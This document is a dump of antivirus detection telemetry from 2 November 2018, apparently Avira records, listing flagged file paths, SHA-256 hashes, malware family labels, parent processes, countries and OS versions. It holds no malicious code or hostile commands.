  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common2.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMMON2\\COMMON2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160016-eefcb76f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160016-EEFCB76F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105512-501bb965', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b872c6c\\AVSCAN-20181102-104924-1CD3574C\\AVSCAN-20181102-105512-501BB965', filesize=768000, name='TR/Drop.Agent.768000.1.#M1.#R1'), hash='3753b3b424847cb90dde4541fa7f7a0d5b0fc2417be35337c830b79ed5be0f3e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182213-8cb7758c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-182005-75E689BF\\AVSCAN-20181102-182213-8CB7758C', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:22:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130847-63adeb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130847-63ADEB64', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\49EDD8~1\\SyncTask.exe', filesize=640000, name='Adware/DealPly.3c8ebd.#M1.#R1'), hash='3c8ebdd436177dc27e91b78ce326e7565d0ea00cdffd6545048e9b2987c59075', metadata=Row(cmdline='\\/Check', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=359936, timestamp='2018-11-02T22:14:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='49bc2bddbdfae7a37c84eacece4cada4fcd9ac5bb4b041e930c56d4a04b2dce2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T00:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libusb0.dll', filepath='F:\\all mobile softwae\\all driver\\Piranha_box_V1.49 Full Complete by Solim\\Drivers\\Mobile Phone Drivers\\Coolsand_Drivers\\Coolsand_Driver\\libusb0.dll', filesize=432000, name='W32/Ramnit.C.#M1.#R1'), hash='138b433749070312fe1b7407d1ddc31c1b59a0e1432c45b7132da9d7aa110645', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1207696, timestamp='2018-11-02T14:49:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9958289\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081041-182c760b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081041-182C760B', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='22956673e55f57557f4b8f91685a00e7fb646f87e758a3e519a1429be7289f90', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2\\\\\\/I7YfiU30u12FoH.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-02T09:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\program files (x86)\\microsoft office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='--engine=2 --session-id=CWvDMjugKcUbNIkFXcJkcRVPIAbjV\\\\\\/S\\\\\\/fU+91ey\\\\\\/ --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T17:19:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171120-cc744133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836e581e\\AVSCAN-20181102-171107-CA5DE4B6\\AVSCAN-20181102-171120-CC744133', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='774b3084e7e2ee3f38c4c6d9cc696c88c606c97b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\774b3084e7e2ee3f38c4c6d9cc696c88c606c97b', filesize=2112000, name='Adware/DealPly.20fe88.#M1.#R1'), hash='20fe88b3b788dc9b6dc96547b0c8f7d232037334196afdb1435e09dc082e5d79', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:54:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171310-f6abe1d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5962524\\AVSCAN-20181102-170133-9D62EB10\\AVSCAN-20181102-171310-F6ABE1D9', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='3110b1afdedbad8be144744661e48e5fe1484ec72879936c34e962adc29a6aba', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bonusgame.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\BonusGame\\BonusGame.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T083005-00020/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154843-6e69b351', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154843-6E69B351', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061217-384dfe3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061217-384DFE3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051517-42112122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051517-42112122', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX85.200\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX85.200\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:33:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050319-95efd233', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050319-95EFD233', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143639-4af0d295', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143639-4AF0D295', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061246-494e409a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061246-494E409A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4B56F922FD9B0C4ADB697EA3500F93D5E88AB0F090454C0677F42D94CCAFD7CD', filesize=2112000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:23:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082804-bc949a31', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082735-EAAD22EE\\AVSCAN-20181102-082804-BC949A31', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\52D63506E30F7217257625B20BDF6B4B85B6B4EE6B8213C66720B6D153F6DF9E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:56:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.742\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.742\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:45:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130351-4061d18b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130351-4061D18B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202501-546c27a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d43ee73c\\AVSCAN-20181102-201805-1A7B5F93\\AVSCAN-20181102-202501-546C27A0', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050330-9c762d38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050330-9C762D38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:29Z'), dt=datetime.date(2018, 11, 2)),
